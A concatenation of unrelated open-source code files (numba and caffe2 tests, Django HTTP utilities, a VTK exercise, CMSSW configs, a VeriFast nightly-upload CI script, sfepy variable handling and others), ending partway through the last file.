def kernel_warp_reduce(inp, out):
idx = roc.get_group_id(0)
val = inp[idx]
out[idx] = wave_reduce(val)
@roc.jit
def kernel_flat_reduce(inp, out):
out[0] = wave_reduce(inp)
class TestReduction(unittest.TestCase):
def template_wave_reduce_int(self, dtype):
numblk = 2
inp = np.arange(numblk * WAVESIZE, dtype=dtype).reshape(numblk, WAVESIZE)
inp_cpy = np.copy(inp)
out = np.zeros((numblk,))
kernel_warp_reduce[numblk, WAVESIZE](inp, out)
np.testing.assert_equal(out, inp_cpy.sum(axis=1))
def test_wave_reduce_intp(self):
self.template_wave_reduce_int(np.intp)
def test_wave_reduce_int32(self):
self.template_wave_reduce_int(np.int32)
def template_wave_reduce_real(self, dtype):
numblk = 2
inp = np.linspace(0, 1, numblk * WAVESIZE).astype(dtype)
inp = inp.reshape(numblk, WAVESIZE)
inp_cpy = np.copy(inp)
out = np.zeros((numblk,))
kernel_warp_reduce[numblk, WAVESIZE](inp, out)
np.testing.assert_allclose(out, inp_cpy.sum(axis=1))
def test_wave_reduce_float64(self):
self.template_wave_reduce_real(np.float64)
def test_wave_reduce_float32(self):
self.template_wave_reduce_real(np.float32)
def test_flat_reduce(self):
inp = np.arange(WAVESIZE) # destroyed in kernel
out = np.zeros((1,))
kernel_flat_reduce[1, WAVESIZE](inp, out)
np.testing.assert_allclose(out[0], np.arange(WAVESIZE).sum())
if __name__ == '__main__':
unittest.main()
|
caffe2/python/operator_test/normalize_op_test.py | KevinKecc/caffe2 | 585 | 11194965 | # Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
from hypothesis import given
import hypothesis.strategies as st
from caffe2.python import core
import caffe2.python.hypothesis_test_util as hu
class TestNormalizeOp(hu.HypothesisTestCase):
@given(X=hu.tensor(min_dim=1,
max_dim=5,
elements=st.floats(min_value=0.5, max_value=1.0)),
**hu.gcs)
def test_normalize(self, X, gc, dc):
def ref_normalize(X, axis):
x_normed = X / (
np.sqrt((X**2).sum(axis=axis, keepdims=True)) + np.finfo(X.dtype).tiny)
return (x_normed,)
for axis in range(-X.ndim, X.ndim):
op = core.CreateOperator("Normalize", "X", "Y", axis=axis)
self.assertReferenceChecks(
gc,
op,
[X],
functools.partial(ref_normalize, axis=axis))
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(min_dim=1,
max_dim=5,
elements=st.floats(min_value=0.5, max_value=1.0)),
**hu.gcs)
def test_normalize_L1(self, X, gc, dc):
def ref(X, axis):
norm = abs(X).sum(axis=axis, keepdims=True)
return (X / norm,)
for axis in range(-X.ndim, X.ndim):
print('axis: ', axis)
op = core.CreateOperator("NormalizeL1", "X", "Y", axis=axis)
self.assertReferenceChecks(
gc,
op,
[X],
functools.partial(ref, axis=axis))
self.assertDeviceChecks(dc, op, [X], [0])
|
django/utils/http.py | KaushikSathvara/django | 61,676 | 11194969 | <filename>django/utils/http.py
import base64
import datetime
import re
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from urllib.parse import (
ParseResult, SplitResult, _coerce_args, _splitnetloc, _splitparams,
scheme_chars, urlencode as original_urlencode, uses_params,
)
from django.utils.datastructures import MultiValueDict
from django.utils.regex_helper import _lazy_re_compile
# based on RFC 7232, Appendix C
ETAG_MATCH = _lazy_re_compile(r'''
\A( # start of string and capture group
(?:W/)? # optional weak indicator
" # opening quote
[^"]* # any sequence of non-quote characters
" # end quote
)\Z # end of string and capture group
''', re.X)
MONTHS = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
__D = r'(?P<day>\d{2})'
__D2 = r'(?P<day>[ \d]\d)'
__M = r'(?P<mon>\w{3})'
__Y = r'(?P<year>\d{4})'
__Y2 = r'(?P<year>\d{2})'
__T = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})'
RFC1123_DATE = _lazy_re_compile(r'^\w{3}, %s %s %s %s GMT$' % (__D, __M, __Y, __T))
RFC850_DATE = _lazy_re_compile(r'^\w{6,9}, %s-%s-%s %s GMT$' % (__D, __M, __Y2, __T))
ASCTIME_DATE = _lazy_re_compile(r'^\w{3} %s %s %s %s$' % (__M, __D2, __T, __Y))
RFC3986_GENDELIMS = ":/?#[]@"
RFC3986_SUBDELIMS = "!$&'()*+,;="
def urlencode(query, doseq=False):
"""
A version of Python's urllib.parse.urlencode() function that can operate on
MultiValueDict and non-string values.
"""
if isinstance(query, MultiValueDict):
query = query.lists()
elif hasattr(query, 'items'):
query = query.items()
query_params = []
for key, value in query:
if value is None:
raise TypeError(
"Cannot encode None for key '%s' in a query string. Did you "
"mean to pass an empty string or omit the value?" % key
)
elif not doseq or isinstance(value, (str, bytes)):
query_val = value
else:
try:
itr = iter(value)
except TypeError:
query_val = value
else:
# Consume generators and iterators, when doseq=True, to
# work around https://bugs.python.org/issue31706.
query_val = []
for item in itr:
if item is None:
raise TypeError(
"Cannot encode None for key '%s' in a query "
"string. Did you mean to pass an empty string or "
"omit the value?" % key
)
elif not isinstance(item, bytes):
item = str(item)
query_val.append(item)
query_params.append((key, query_val))
return original_urlencode(query_params, doseq)
def http_date(epoch_seconds=None):
"""
Format the time to match the RFC1123 date format as specified by HTTP
RFC7231 section 7.1.1.1.
`epoch_seconds` is a floating point number expressed in seconds since the
epoch, in UTC - such as that outputted by time.time(). If set to None, it
defaults to the current time.
Output a string in the format 'Wdy, DD Mon YYYY HH:MM:SS GMT'.
"""
return formatdate(epoch_seconds, usegmt=True)
def parse_http_date(date):
"""
Parse a date format as specified by HTTP RFC7231 section 7.1.1.1.
The three formats allowed by the RFC are accepted, even if only the first
one is still in widespread use.
Return an integer expressed in seconds since the epoch, in UTC.
"""
# email.utils.parsedate() does the job for RFC1123 dates; unfortunately
# RFC7231 makes it mandatory to support RFC850 dates too. So we roll
# our own RFC-compliant parsing.
for regex in RFC1123_DATE, RFC850_DATE, ASCTIME_DATE:
m = regex.match(date)
if m is not None:
break
else:
raise ValueError("%r is not in a valid HTTP date format" % date)
try:
tz = datetime.timezone.utc
year = int(m['year'])
if year < 100:
current_year = datetime.datetime.now(tz=tz).year
current_century = current_year - (current_year % 100)
if year - (current_year % 100) > 50:
# year that appears to be more than 50 years in the future are
# interpreted as representing the past.
year += current_century - 100
else:
year += current_century
month = MONTHS.index(m['mon'].lower()) + 1
day = int(m['day'])
hour = int(m['hour'])
min = int(m['min'])
sec = int(m['sec'])
result = datetime.datetime(year, month, day, hour, min, sec, tzinfo=tz)
return int(result.timestamp())
except Exception as exc:
raise ValueError("%r is not a valid date" % date) from exc
def parse_http_date_safe(date):
"""
Same as parse_http_date, but return None if the input is invalid.
"""
try:
return parse_http_date(date)
except Exception:
pass
# Base 36 functions: useful for generating compact URLs
def base36_to_int(s):
"""
Convert a base 36 string to an int. Raise ValueError if the input won't fit
into an int.
"""
# To prevent overconsumption of server resources, reject any
# base36 string that is longer than 13 base36 digits (13 digits
# is sufficient to base36-encode any 64-bit integer)
if len(s) > 13:
raise ValueError("Base36 input too large")
return int(s, 36)
def int_to_base36(i):
"""Convert an integer to a base36 string."""
char_set = '0123456789abcdefghijklmnopqrstuvwxyz'
if i < 0:
raise ValueError("Negative base36 conversion input.")
if i < 36:
return char_set[i]
b36 = ''
while i != 0:
i, n = divmod(i, 36)
b36 = char_set[n] + b36
return b36
def urlsafe_base64_encode(s):
"""
Encode a bytestring to a base64 string for use in URLs. Strip any trailing
equal signs.
"""
return base64.urlsafe_b64encode(s).rstrip(b'\n=').decode('ascii')
def urlsafe_base64_decode(s):
"""
Decode a base64 encoded string. Add back any trailing equal signs that
might have been stripped.
"""
s = s.encode()
try:
return base64.urlsafe_b64decode(s.ljust(len(s) + len(s) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
def parse_etags(etag_str):
"""
Parse a string of ETags given in an If-None-Match or If-Match header as
defined by RFC 7232. Return a list of quoted ETags, or ['*'] if all ETags
should be matched.
"""
if etag_str.strip() == '*':
return ['*']
else:
# Parse each ETag individually, and return any that are valid.
etag_matches = (ETAG_MATCH.match(etag.strip()) for etag in etag_str.split(','))
return [match[1] for match in etag_matches if match]
def quote_etag(etag_str):
"""
If the provided string is already a quoted ETag, return it. Otherwise, wrap
the string in quotes, making it a strong ETag.
"""
if ETAG_MATCH.match(etag_str):
return etag_str
else:
return '"%s"' % etag_str
def is_same_domain(host, pattern):
"""
Return ``True`` if the host is either an exact match or a match
to the wildcard pattern.
Any pattern beginning with a period matches a domain and all of its
subdomains. (e.g. ``.example.com`` matches ``example.com`` and
``foo.example.com``). Anything else is an exact string match.
"""
if not pattern:
return False
pattern = pattern.lower()
return (
pattern[0] == '.' and (host.endswith(pattern) or host == pattern[1:]) or
pattern == host
)
def url_has_allowed_host_and_scheme(url, allowed_hosts, require_https=False):
"""
Return ``True`` if the url uses an allowed host and a safe scheme.
Always return ``False`` on an empty url.
If ``require_https`` is ``True``, only 'https' will be considered a valid
scheme, as opposed to 'http' and 'https' with the default, ``False``.
Note: "True" doesn't entail that a URL is "safe". It may still be e.g.
quoted incorrectly. Ensure to also use django.utils.encoding.iri_to_uri()
on the path component of untrusted URLs.
"""
if url is not None:
url = url.strip()
if not url:
return False
if allowed_hosts is None:
allowed_hosts = set()
elif isinstance(allowed_hosts, str):
allowed_hosts = {allowed_hosts}
# Chrome treats \ completely as / in paths but it could be part of some
# basic auth credentials so we need to check both URLs.
return (
_url_has_allowed_host_and_scheme(url, allowed_hosts, require_https=require_https) and
_url_has_allowed_host_and_scheme(url.replace('\\', '/'), allowed_hosts, require_https=require_https)
)
# Copied from urllib.parse.urlparse() but uses fixed urlsplit() function.
def _urlparse(url, scheme='', allow_fragments=True):
"""Parse a URL into 6 components:
<scheme>://<netloc>/<path>;<params>?<query>#<fragment>
Return a 6-tuple: (scheme, netloc, path, params, query, fragment).
Note that we don't break the components up in smaller bits
(e.g. netloc is a single string) and we don't expand % escapes."""
url, scheme, _coerce_result = _coerce_args(url, scheme)
splitresult = _urlsplit(url, scheme, allow_fragments)
scheme, netloc, url, query, fragment = splitresult
if scheme in uses_params and ';' in url:
url, params = _splitparams(url)
else:
params = ''
result = ParseResult(scheme, netloc, url, params, query, fragment)
return _coerce_result(result)
# Copied from urllib.parse.urlsplit() with
# https://github.com/python/cpython/pull/661 applied.
def _urlsplit(url, scheme='', allow_fragments=True):
"""Parse a URL into 5 components:
<scheme>://<netloc>/<path>?<query>#<fragment>
Return a 5-tuple: (scheme, netloc, path, query, fragment).
Note that we don't break the components up in smaller bits
(e.g. netloc is a single string) and we don't expand % escapes."""
url, scheme, _coerce_result = _coerce_args(url, scheme)
netloc = query = fragment = ''
i = url.find(':')
if i > 0:
for c in url[:i]:
if c not in scheme_chars:
break
else:
scheme, url = url[:i].lower(), url[i + 1:]
if url[:2] == '//':
netloc, url = _splitnetloc(url, 2)
if (('[' in netloc and ']' not in netloc) or
(']' in netloc and '[' not in netloc)):
raise ValueError("Invalid IPv6 URL")
if allow_fragments and '#' in url:
url, fragment = url.split('#', 1)
if '?' in url:
url, query = url.split('?', 1)
v = SplitResult(scheme, netloc, url, query, fragment)
return _coerce_result(v)
def _url_has_allowed_host_and_scheme(url, allowed_hosts, require_https=False):
# Chrome considers any URL with more than two slashes to be absolute, but
# urlparse is not so flexible. Treat any url with three slashes as unsafe.
if url.startswith('///'):
return False
try:
url_info = _urlparse(url)
except ValueError: # e.g. invalid IPv6 addresses
return False
# Forbid URLs like http:///example.com - with a scheme, but without a hostname.
# In that URL, example.com is not the hostname but, a path component. However,
# Chrome will still consider example.com to be the hostname, so we must not
# allow this syntax.
if not url_info.netloc and url_info.scheme:
return False
# Forbid URLs that start with control characters. Some browsers (like
# Chrome) ignore quite a few control characters at the start of a
# URL and might consider the URL as scheme relative.
if unicodedata.category(url[0])[0] == 'C':
return False
scheme = url_info.scheme
# Consider URLs without a scheme (e.g. //example.com/p) to be http.
if not url_info.scheme and url_info.netloc:
scheme = 'http'
valid_schemes = ['https'] if require_https else ['http', 'https']
return ((not url_info.netloc or url_info.netloc in allowed_hosts) and
(not scheme or scheme in valid_schemes))
def escape_leading_slashes(url):
"""
If redirecting to an absolute path (two leading slashes), a slash must be
escaped to prevent browsers from handling the path as schemaless and
redirecting to another host.
"""
if url.startswith('//'):
url = '/%2F{}'.format(url[2:])
return url
|
Filters/Programmable/Testing/Python/MultidimensionalSolution.py | forestGzh/VTK | 1,755 | 11194986 | <filename>Filters/Programmable/Testing/Python/MultidimensionalSolution.py
#!/usr/bin/env python
import vtk
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
#
# The dataset read by this exercise ("combVectors.vtk") has field data
# associated with the pointdata, namely two vector fields. In this exercise,
# you will convert both sets of field data into attribute data. Mappers only
# process attribute data, not field data. So we must convert the field data to
# attribute data in order to display it. (You'll need to determine the "names"
# of the two vector fields in the field data.)
#
# If there is time remaining, you might consider adding a programmable filter
# to convert the two sets of vectors into a single scalar field, representing
# the angle between the two vector fields.
#
# You will most likely use vtkFieldDataToAttributeDataFilter, vtkHedgeHog,
# and vtkProgrammableAttributeDataFilter.
#
# Create the RenderWindow, Renderer and interactor
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.SetMultiSamples(0)
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# create pipeline
#
# get the pressure gradient vector field
pl3d_gradient = vtk.vtkMultiBlockPLOT3DReader()
pl3d_gradient.SetXYZFileName("" + str(VTK_DATA_ROOT) + "/Data/combxyz.bin")
pl3d_gradient.SetQFileName("" + str(VTK_DATA_ROOT) + "/Data/combq.bin")
pl3d_gradient.SetScalarFunctionNumber(100)
pl3d_gradient.SetVectorFunctionNumber(210)
pl3d_gradient.Update()
pl3d_g_output = pl3d_gradient.GetOutput().GetBlock(0)
# get the velocity vector field
pl3d_velocity = vtk.vtkMultiBlockPLOT3DReader()
pl3d_velocity.SetXYZFileName("" + str(VTK_DATA_ROOT) + "/Data/combxyz.bin")
pl3d_velocity.SetQFileName("" + str(VTK_DATA_ROOT) + "/Data/combq.bin")
pl3d_velocity.SetScalarFunctionNumber(100)
pl3d_velocity.SetVectorFunctionNumber(200)
pl3d_velocity.Update()
pl3d_v_output = pl3d_velocity.GetOutput().GetBlock(0)
# contour the scalar fields
contour = vtk.vtkContourFilter()
contour.SetInputData(pl3d_g_output)
contour.SetValue(0,0.225)
# probe the vector fields to get data at the contour surface
probe_gradient = vtk.vtkProbeFilter()
probe_gradient.SetInputConnection(contour.GetOutputPort())
probe_gradient.SetSourceData(pl3d_g_output)
probe_velocity = vtk.vtkProbeFilter()
probe_velocity.SetInputConnection(contour.GetOutputPort())
probe_velocity.SetSourceData(pl3d_v_output)
#
# To display the vector fields, we use vtkHedgeHog to create lines.
#
velocity = vtk.vtkHedgeHog()
velocity.SetInputConnection(probe_velocity.GetOutputPort())
velocity.SetScaleFactor(0.0015)
pressureGradient = vtk.vtkHedgeHog()
pressureGradient.SetInputConnection(probe_gradient.GetOutputPort())
pressureGradient.SetScaleFactor(0.00002)
def ExecuteDot (__vtk__temp0=0,__vtk__temp1=0):
# proc for ProgrammableAttributeDataFilter. Note the use of "double()"
# in the calculations. This protects us from Python using ints and
# overflowing.
inputs = dotProduct.GetInputList()
input0 = inputs.GetDataSet(0)
input1 = inputs.GetDataSet(1)
numPts = input0.GetNumberOfPoints()
vectors0 = input0.GetPointData().GetVectors()
vectors1 = input1.GetPointData().GetVectors()
scalars = vtk.vtkFloatArray()
i = 0
while i < numPts:
v0 = vectors0.GetTuple3(i)
v1 = vectors1.GetTuple3(i)
v0x = lindex(v0,0)
v0y = lindex(v0,1)
v0z = lindex(v0,2)
v1x = lindex(v1,0)
v1y = lindex(v1,1)
v1z = lindex(v1,2)
l0 = expr.expr(globals(), locals(),["double","(","v0x",")*","double","(","v0x",")","+","double","(","v0y",")*","double","(","v0y",")","+","double","(","v0z",")*","double","(","v0z",")"])
l1 = expr.expr(globals(), locals(),["double","(","v1x",")*","double","(","v1x",")","+","double","(","v1y",")*","double","(","v1y",")","+","double","(","v1z",")*","double","(","v1z",")"])
l0 = expr.expr(globals(), locals(),["sqrt","(","double","(","l0","))"])
l1 = expr.expr(globals(), locals(),["sqrt","(","double","(","l1","))"])
if (l0 > 0.0 and l1 > 0.0):
d = expr.expr(globals(), locals(),["(","double","(","v0x",")*","double","(","v1x",")","+","double","(","v0y",")*","double","(","v1y",")","+","double","(","v0z",")*","double","(","v1z","))/(","l0","*","l1",")"])
pass
else:
d = 0.0
pass
scalars.InsertValue(i,d)
i = i + 1
dotProduct.GetOutput().GetPointData().SetScalars(scalars)
del scalars
#
# We use the ProgrammableAttributeDataFilter to compute the cosine
# of the angle between the two vector fields (i.e. the dot product
# normalized by the product of the vector lengths).
#
#
dotProduct = vtk.vtkProgrammableAttributeDataFilter()
dotProduct.SetInputConnection(probe_velocity.GetOutputPort())
dotProduct.AddInput(probe_velocity.GetOutput())
dotProduct.AddInput(probe_gradient.GetOutput())
dotProduct.SetExecuteMethod(ExecuteDot)
#
# Create the mappers and actors. Note the call to GetPolyDataOutput when
# setting up the mapper for the ProgrammableAttributeDataFilter
#
velocityMapper = vtk.vtkPolyDataMapper()
velocityMapper.SetInputConnection(velocity.GetOutputPort())
velocityMapper.ScalarVisibilityOff()
velocityActor = vtk.vtkLODActor()
velocityActor.SetMapper(velocityMapper)
velocityActor.SetNumberOfCloudPoints(1000)
velocityActor.GetProperty().SetColor(1,0,0)
pressureGradientMapper = vtk.vtkPolyDataMapper()
pressureGradientMapper.SetInputConnection(pressureGradient.GetOutputPort())
pressureGradientMapper.ScalarVisibilityOff()
pressureGradientActor = vtk.vtkLODActor()
pressureGradientActor.SetMapper(pressureGradientMapper)
pressureGradientActor.SetNumberOfCloudPoints(1000)
pressureGradientActor.GetProperty().SetColor(0,1,0)
dotMapper = vtk.vtkPolyDataMapper()
dotMapper.SetInputConnection(dotProduct.GetOutputPort())
dotMapper.SetScalarRange(-1,1)
dotActor = vtk.vtkLODActor()
dotActor.SetMapper(dotMapper)
dotActor.SetNumberOfCloudPoints(1000)
#
# The PLOT3DReader is used to draw the outline of the original dataset.
#
pl3d = vtk.vtkMultiBlockPLOT3DReader()
pl3d.SetXYZFileName("" + str(VTK_DATA_ROOT) + "/Data/combxyz.bin")
pl3d.Update()
pl3d_output = pl3d.GetOutput().GetBlock(0)
outline = vtk.vtkStructuredGridOutlineFilter()
outline.SetInputData(pl3d_output)
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
outlineActor.GetProperty().SetColor(0,0,0)
#
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(outlineActor)
ren1.AddActor(velocityActor)
ren1.AddActor(pressureGradientActor)
ren1.AddActor(dotActor)
ren1.SetBackground(1,1,1)
renWin.SetSize(500,500)
#ren1 SetBackground 0.1 0.2 0.4
cam1 = ren1.GetActiveCamera()
cam1.SetClippingRange(3.95297,50)
cam1.SetFocalPoint(9.71821,0.458166,29.3999)
cam1.SetPosition(-21.6807,-22.6387,35.9759)
cam1.SetViewUp(-0.0158865,0.293715,0.955761)
# render the image
#
renWin.Render()
renWin.SetWindowName("Multidimensional Visualization Exercise")
# prevent the tk window from showing up then start the event loop
# --- end of script --
|
mindsdb/integrations/mariadb_handler/mariadb_handler.py | mindsdb/main | 261 | 11194991 | from mindsdb.integrations.mysql_handler.mysql_handler import MySQLHandler
class MariaDBHandler(MySQLHandler):
"""
This handler handles connection and execution of the MariaDB statements.
"""
def __init__(self, name, **kwargs):
super().__init__(name, **kwargs) |
testFetch.py | icarito/guy | 194 | 11195005 | #!/usr/bin/env python3
# # -*- coding: utf-8 -*-
import guy
# call a http service during an async rpc method call
class Fetch(guy.Guy): # name the class as the web/<class_name>.html
size=guy.FULLSCREEN
__doc__="""
<style>
body,html,center {width:100%;height:100%;margin:0px;padding:0px;cursor:pointer;background:black}
img {
max-height: 100%;
width: auto;
}
div {position:fixed;top:10px;right:20px;z-index:2;color:red;font-size:100px;font-family:sans-serif}
</style>
<script>
var list=[];
guy.init( function() {
guy.fetch("https://www.reddit.com/r/pics/.rss") // not possible with classic window.fetch()
.then( x=>{return x.text()} )
.then( x=>{
list=x.match(/https:..i\.redd\.it\/[^\.]+\..../g)
change()
})
})
function change(n) {
document.querySelector("#i").src=list[0];
list.push( list.shift() )
}
</script>
<center>
<img id="i" src="" onclick="change()"/>
</center>
<div onclick="guy.exit()">X</div>
"""
if __name__=="__main__":
Fetch().run()
|
RecoBTag/SecondaryVertex/python/negativeCombinedSecondaryVertexV2Computer_cfi.py | ckamtsikis/cmssw | 852 | 11195009 | <filename>RecoBTag/SecondaryVertex/python/negativeCombinedSecondaryVertexV2Computer_cfi.py<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from RecoBTag.SecondaryVertex.combinedSecondaryVertexV2Computer_cfi import *
negativeCombinedSecondaryVertexV2Computer = combinedSecondaryVertexV2Computer.clone(
vertexFlip = True,
trackFlip = True,
trackSelection = dict(sip3dSigMax = 0),
trackPseudoSelection = dict(sip3dSigMax = 0,
sip2dSigMin = -99999.9,
sip2dSigMax = -2.0)
)
|
upload.py | swils/verifast | 272 | 11195049 | <gh_stars>100-1000
import sys
import os
import json
from google.oauth2 import service_account
from google.cloud import storage
credentials = service_account.Credentials.from_service_account_info(json.loads(os.environ['GOOGLE_CLOUD_PLATFORM_CREDENTIALS']))
storageClient = storage.Client(credentials.project_id, credentials)
bucket = storageClient.bucket('verifast-nightlies')
vfversion = os.environ['VFVERSION']
OS = os.environ['VERIFAST_OS']
if OS == 'Windows_NT':
os_tag = 'windows'
local_prefix = 'src/'
suffix = '.zip'
elif OS == 'Darwin':
os_tag = 'macos'
local_prefix = 'upload/'
suffix = '-osx.tar.gz'
else:
local_prefix = 'upload/'
os_tag = 'linux'
suffix = '.tar.gz'
prefix = 'latest/' + os_tag + '/'
old_nightlies = list(storageClient.list_blobs(bucket, prefix=prefix))
local_filename = local_prefix + 'verifast-nightly' + suffix
object_filename = 'verifast-' + vfversion + suffix
new_nightly = bucket.blob(prefix + object_filename)
print('Uploading {} to {}...'.format(local_filename, new_nightly.name))
new_nightly.upload_from_filename(local_filename)
print('Uploaded {} to {}.'.format(local_filename, new_nightly.name))
html = """\
<html>
<head>
<meta http-equiv="refresh" content="0; URL={}" />
</head>
</html>
""".format(prefix + object_filename)
html_object_filename = 'verifast-nightly-{}-latest.html'.format(os_tag)
print('Updating {}...'.format(html_object_filename))
html_blob = bucket.blob(html_object_filename)
html_blob.cache_control = 'no-cache, max-age=0'
html_blob.upload_from_string(html, content_type='text/html')
print('Updated {}'.format(html_object_filename))
if old_nightlies:
print('Deleting old nightlies {}'.format(old_nightlies))
for old_nightly in old_nightlies:
if old_nightly.name != new_nightly.name:
old_nightly.delete()
print('Deleted {}'.format(old_nightly.name))
|
great_expectations/core/usage_statistics/anonymizers/data_docs_site_anonymizer.py | vanderGoes/great_expectations | 6,451 | 11195053 | from great_expectations.core.usage_statistics.anonymizers.anonymizer import Anonymizer
from great_expectations.core.usage_statistics.anonymizers.site_builder_anonymizer import (
SiteBuilderAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.store_backend_anonymizer import (
StoreBackendAnonymizer,
)
class DataDocsSiteAnonymizer(Anonymizer):
def __init__(self, salt=None):
super().__init__(salt=salt)
self._site_builder_anonymizer = SiteBuilderAnonymizer(salt=salt)
self._store_backend_anonymizer = StoreBackendAnonymizer(salt=salt)
def anonymize_data_docs_site_info(self, site_name, site_config):
site_config_module_name = site_config.get("module_name")
if site_config_module_name is None:
site_config[
"module_name"
] = "great_expectations.render.renderer.site_builder"
anonymized_info_dict = (
self._site_builder_anonymizer.anonymize_site_builder_info(
site_builder_config=site_config,
)
)
anonymized_info_dict["anonymized_name"] = self.anonymize(site_name)
store_backend_config = site_config.get("store_backend")
anonymized_info_dict[
"anonymized_store_backend"
] = self._store_backend_anonymizer.anonymize_store_backend_info(
store_backend_object_config=store_backend_config
)
site_index_builder_config = site_config.get("site_index_builder")
anonymized_site_index_builder = (
self._site_builder_anonymizer.anonymize_site_builder_info(
site_builder_config=site_index_builder_config
)
)
# Note AJB-20201218 show_cta_footer was removed in v 0.9.9 via PR #1249
if "show_cta_footer" in site_index_builder_config:
anonymized_site_index_builder[
"show_cta_footer"
] = site_index_builder_config.get("show_cta_footer")
anonymized_info_dict[
"anonymized_site_index_builder"
] = anonymized_site_index_builder
return anonymized_info_dict
|
Lib/test/test_multiprocessing_forkserver.py | shawwn/cpython | 52,316 | 11195061 | import unittest
import test._test_multiprocessing
import sys
from test import support
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
if sys.platform == "win32":
raise unittest.SkipTest("forkserver is not available on Windows")
test._test_multiprocessing.install_tests_in_module_dict(globals(), 'forkserver')
if __name__ == '__main__':
unittest.main()
|
Geometry/HGCalGeometry/test/python/testHGCalWaferInFileTestV15_cfg.py | Purva-Chaudhari/cmssw | 852 | 11195063 | import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Phase2C11_cff import Phase2C11
process = cms.Process("PROD",Phase2C11)
process.load("SimGeneral.HepPDTESSource.pdt_cfi")
process.load("Geometry.HGCalCommonData.testHGCalV15XML_cfi")
process.load("Geometry.HGCalCommonData.hgcalV15ParametersInitialization_cfi")
process.load("Geometry.HGCalCommonData.hgcalNumberingInitialization_cfi")
process.load("Geometry.CaloEventSetup.HGCalV9Topology_cfi")
process.load("Geometry.HGCalGeometry.HGCalGeometryESProducer_cfi")
process.load("Geometry.HGCalGeometry.hgcalEEWaferInFileTest_cfi")
process.load('FWCore.MessageService.MessageLogger_cfi')
if hasattr(process,'MessageLogger'):
process.MessageLogger.HGCalGeom=dict()
process.load("IOMC.RandomEngine.IOMC_cff")
process.RandomNumberGeneratorService.generator.initialSeed = 456789
process.source = cms.Source("EmptySource")
process.generator = cms.EDProducer("FlatRandomEGunProducer",
PGunParameters = cms.PSet(
PartID = cms.vint32(14),
MinEta = cms.double(-3.5),
MaxEta = cms.double(3.5),
MinPhi = cms.double(-3.14159265359),
MaxPhi = cms.double(3.14159265359),
MinE = cms.double(9.99),
MaxE = cms.double(10.01)
),
AddAntiParticle = cms.bool(False),
Verbosity = cms.untracked.int32(0),
firstRun = cms.untracked.uint32(1)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
#process.hgcalEEWaferInFileTest.Verbosity = 1
process.hgcalHEWaferInFileTest = process.hgcalEEWaferInFileTest.clone(
NameSense = "HGCalHESiliconSensitive",
NameDevice = "HGCal HE Silicon",
)
process.p1 = cms.Path(process.generator*process.hgcalEEWaferInFileTest*process.hgcalHEWaferInFileTest)
|
sfepy/discrete/variables.py | BubuLK/sfepy | 510 | 11195067 | """
Classes of variables for equations/terms.
"""
from __future__ import print_function
from __future__ import absolute_import
from collections import deque
import numpy as nm
from sfepy.base.base import (real_types, complex_types, assert_, get_default,
output, OneTypeList, Container, Struct, basestr,
iter_dict_of_lists)
from sfepy.base.timing import Timer
import sfepy.linalg as la
from sfepy.discrete.functions import Function
from sfepy.discrete.conditions import get_condition_value
from sfepy.discrete.integrals import Integral
from sfepy.discrete.common.dof_info import (DofInfo, EquationMap,
expand_nodes_to_equations,
is_active_bc)
from sfepy.discrete.fem.lcbc_operators import LCBCOperators
from sfepy.discrete.common.mappings import get_physical_qps
from sfepy.discrete.evaluate_variable import eval_real, eval_complex
import six
from six.moves import range
is_state = 0
is_virtual = 1
is_parameter = 2
is_field = 10
def create_adof_conns(conn_info, var_indx=None, active_only=True, verbose=True):
"""
Create active DOF connectivities for all variables referenced in
`conn_info`.
If a variable has not the equation mapping, a trivial mapping is assumed
and connectivity with all DOFs active is created.
DOF connectivity key is a tuple ``(primary variable name, region name,
type, is_trace flag)``.
Notes
-----
If `active_only` is False, the DOF connectivities contain all DOFs, with
the E(P)BC-constrained ones stored as `-1 - <DOF number>`, so that the full
connectivities can be reconstructed for the matrix graph creation.
"""
var_indx = get_default(var_indx, {})
def _create(var, econn):
offset = var_indx.get(var.name, slice(0, 0)).start
if var.eq_map is None:
eq = nm.arange(var.n_dof, dtype=nm.int32)
else:
if isinstance(var, DGFieldVariable):
eq = nm.arange(var.n_dof, dtype=nm.int32)
else:
if active_only:
eq = var.eq_map.eq
else:
eq = nm.arange(var.n_dof, dtype=nm.int32)
eq[var.eq_map.eq_ebc] = -1 - (var.eq_map.eq_ebc + offset)
eq[var.eq_map.master] = eq[var.eq_map.slave]
adc = create_adof_conn(eq, econn, var.n_components, offset)
return adc
def _assign(adof_conns, info, region, var, field, is_trace):
key = (var.name, region.name, info.dc_type.type, is_trace)
if not key in adof_conns:
econn = field.get_econn(info.dc_type, region, is_trace=is_trace)
if econn is None: return
adof_conns[key] = _create(var, econn)
if info.is_trace:
key = (var.name, region.name, info.dc_type.type, False)
if not key in adof_conns:
econn = field.get_econn(info.dc_type, region, is_trace=False)
adof_conns[key] = _create(var, econn)
if verbose:
output('setting up dof connectivities...')
timer = Timer(start=True)
adof_conns = {}
for key, ii, info in iter_dict_of_lists(conn_info, return_keys=True):
